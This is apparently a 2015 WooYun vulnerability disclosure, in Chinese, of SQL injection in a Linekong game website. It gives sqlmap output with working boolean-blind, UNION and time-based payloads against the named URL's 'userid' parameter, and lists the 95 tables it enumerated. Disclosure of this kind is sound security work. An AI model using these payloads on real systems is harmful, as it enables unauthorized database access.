当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115362

漏洞标题:蓝港科技《佣兵天下》sql注入注入第五弹

相关厂商:linekong.com

漏洞作者: 风之传说

提交时间:2015-05-22 10:49

修复时间:2015-07-09 14:38

公开时间:2015-07-09 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

蓝港科技《佣兵天下》sql注入注入第五弹

详细说明:

蓝港科技《佣兵天下》sql注入注入第五弹 第五个了,应该很快完了。。。
sql注入链接:
http://yb.linekong.com//wj_detail.php?userid=20
应该又是某些大黑阔找掉了的。。。

GET parameter 'userid' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] n
sqlmap identified the following injection points with a total of 52 HTTP(s) requ
ests:
---
Place: GET
Parameter: userid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: userid=20' AND 2710=2710 AND 'Uzkp'='Uzkp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 49 columns
    Payload: userid=20' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71767
67a71,0x55414c4777774d776179,0x71717a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: userid=20' AND SLEEP(5) AND 'ERAe'='ERAe
---
[16:36:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


来看看数据库,你们的数据库命名都挺有规则的:

available databases [2]:
[*] information_schema
[*] yb_web


来看看表,95个:

Database: yb_web
[95 tables]
+-------------------------------------+
| yb_20121122_code                    |
| yb_20121122_code_log                |
| yb_20121122_send_code               |
| yb_20121122_send_code_log           |
| yb_activity_17173_log               |
| yb_activity_20121122_activate_log   |
| yb_activity_alllevelup_card         |
| yb_activity_alllevelup_card_log     |
| yb_activity_carnival_log            |
| yb_activity_cashgift_log            |
| yb_activity_cdkey                   |
| yb_activity_cj_2010                 |
| yb_activity_conference_activation   |
| yb_activity_conference_question     |
| yb_activity_do_query_getpoint       |
| yb_activity_duowan                  |
| yb_activity_fahao                   |
| yb_activity_fahao3_cdkey_state      |
| yb_activity_fahao3_log              |
| yb_activity_fahao4_cdkey_state      |
| yb_activity_fahao4_log              |
| yb_activity_firstput                |
| yb_activity_flop_log                |
| yb_activity_flopitems               |
| yb_activity_gather120521_items      |
| yb_activity_gather120521_items_log  |
| yb_activity_gather120521_prize      |
| yb_activity_gather120521_spend_log  |
| yb_activity_gather2012_jifen_log    |
| yb_activity_gather2012_oldgame_log  |
| yb_activity_gather2012_qd_log       |
| yb_activity_gather2012_spend_log    |
| yb_activity_identify                |
| yb_activity_jifen                   |
| yb_activity_jifen_log               |
| yb_activity_lottery201206           |
| yb_activity_lottery_sign_log        |
| yb_activity_privacy                 |
| yb_activity_question_log            |
| yb_activity_question_option         |
| yb_activity_question_votes          |
| yb_activity_reserve_log             |
| yb_activity_reserve_m_log           |
| yb_activity_robnum                  |
| yb_activity_roulette_cdkey_state    |
| yb_activity_roulette_log            |
| yb_activity_salary_log              |
| yb_activity_survery201104_log       |
| yb_activity_survery_log             |
| yb_activity_survery_media201104_log |
| yb_activity_xingzuo                 |
| yb_address                          |
| yb_article                          |
| yb_article_demo                     |
| yb_article_inserl                   |
| yb_build                            |
| yb_card_no                          |
| yb_channel                          |
| yb_columns                          |
| yb_comment                          |
| yb_demo                             |
| yb_download                         |
| yb_editors_inserl                   |
| yb_flash                            |
| yb_grading                          |
| yb_group                            |
| yb_image                            |
| yb_image_inserl                     |
| yb_lottery_promotions               |
| yb_member                           |
| yb_pass_card_list                   |
| yb_pass_card_list_log               |
| yb_passportstat                     |
| yb_question                         |
| yb_question_inserl                  |
| yb_regactivate_telphone_log         |
| yb_reply                            |
| yb_solution                         |
| yb_sort                             |
| yb_style                            |
| yb_template                         |
| yb_topic                            |
| yb_topic_inserl                     |
| yb_tuijian                          |
| yb_types                            |
| yb_update_uninstall_log             |
| yb_url                              |
| yb_url_inserl                       |
| yb_vote                             |
| yb_vote_inserl                      |
| yb_vote_option                      |
| yb_wj_article                       |
| yb_wj_article_inserl                |
| yb_wj_image                         |
| yb_wj_image_inserl                  |
+-------------------------------------+

漏洞证明:

如上

修复方案:

这个你们有经验。。

版权声明:转载请注明来源 风之传说@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-25 14:37

厂商回复:

该游戏已下线,感谢指出的漏洞,我们已开始着手关闭该页面的操作

最新状态:

暂无